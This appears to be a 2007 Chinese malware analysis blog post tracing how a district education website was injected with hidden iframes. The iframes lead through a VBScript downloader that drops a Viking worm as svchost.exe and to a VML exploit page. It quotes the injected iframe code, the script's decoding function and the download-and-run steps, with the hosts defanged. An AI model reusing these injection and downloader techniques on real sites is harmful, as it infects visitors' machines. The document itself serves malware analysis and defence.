某市河西區教育資訊網被加入傳播Worm.Win32.Viking.jr等的代碼

endurer 原創
2007-03-26 第1版

該網首頁末被加入代碼：
/---
＜iframe src＝"hxxp://w**.q**b*b****d.com/b**d*.htm?001" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞＜iframe src＝"hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞＜iframe src＝%68%74%74%70%3A%2F%2F%6*A%*2*E%74%6*8**%6*5%63%2E%6*3%6*E%2*F%7*7%77%6B%6*C%2F/%31%2*E%68*%74%6D width＝0 height＝0＞＜/iframe＞
---/

hxxp://www.m*m***ju**.net/bbs/t***j*.htm 包含代碼：
/---
＜iframe src="hxxp://w.qbbd.com/bd.htm?001" width="0" height="0" frameborder="0"＞＜/iframe＞
---/

hxxp://w**.q**b*b****d.com/b**d*.htm?001 包含代碼：
/---
＜iframe src＝"hxxp://w**.q**b*b****d.com/0.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://w**.q**b*b****d.com/0.htm （瑞星網頁監控報為：Trojan.DL.VBS.Agent.clo）包含VBScript指令碼代碼，功能是用自訂函數：

function rechange(k)
s＝Split(k,",")
t＝""
For i ＝ 0 To UBound(s)
t＝t+Chr(eval(s(i)))
Next
rechange＝t
End Function

解密變數t的值並執行。

變數t解密後的值為VBScript指令碼代碼，功能是 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下載檔案 0.exe，儲存為 %temp%/svchost.exe，並建立內容為
/---
Set Shell ＝ Shell.Application
Shell.ShellExecute %temp%/svchost.exe "","","","open",0
---/
的檔案svchost.vbs，通過Shell.Application 對象 的 ShellExecute 方法 來運行svchost.vbs，從而讓%temp%/svchost.exe得已運行。

檔案說明符 : D:/test/0.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-3-26 20:40:47
修改時間 : 2007-3-26 20:41:0
訪問時間 : 2007-3-26 0:0:0
大小 : 69037 位元組 67.429 KB
MD5 : 35ecfe1014702d38a40a0b428679c06a

Scanned file:   0.rar - Infected

0.rar/0.exe - infected by Worm.Win32.Viking.jr Statistics: Known viruses: 285996 Updated: 26-03-2007 File size (Kb): 64 Virus bodies: 1 Files: 1 Warnings: 0 Archives: 1 Suspicious: 0

%68%74%74%70%3A%2F%2F%6*A%*2*E%74%6*8**%6*5%63%2E%6*3%6*E%2*F%7*7%77%6B%6*C%2F/%31%2*E%68*%74%6D即hxxp://j**.t**h*e***c.cn/w**w*k***l//1.htm
包含Javascript指令碼代碼，功能是用unescape解密並輸出變數Words的值，Words解密後的值包含資訊：＜!--  vml'exploit!  --＞ 和shellcode 代碼……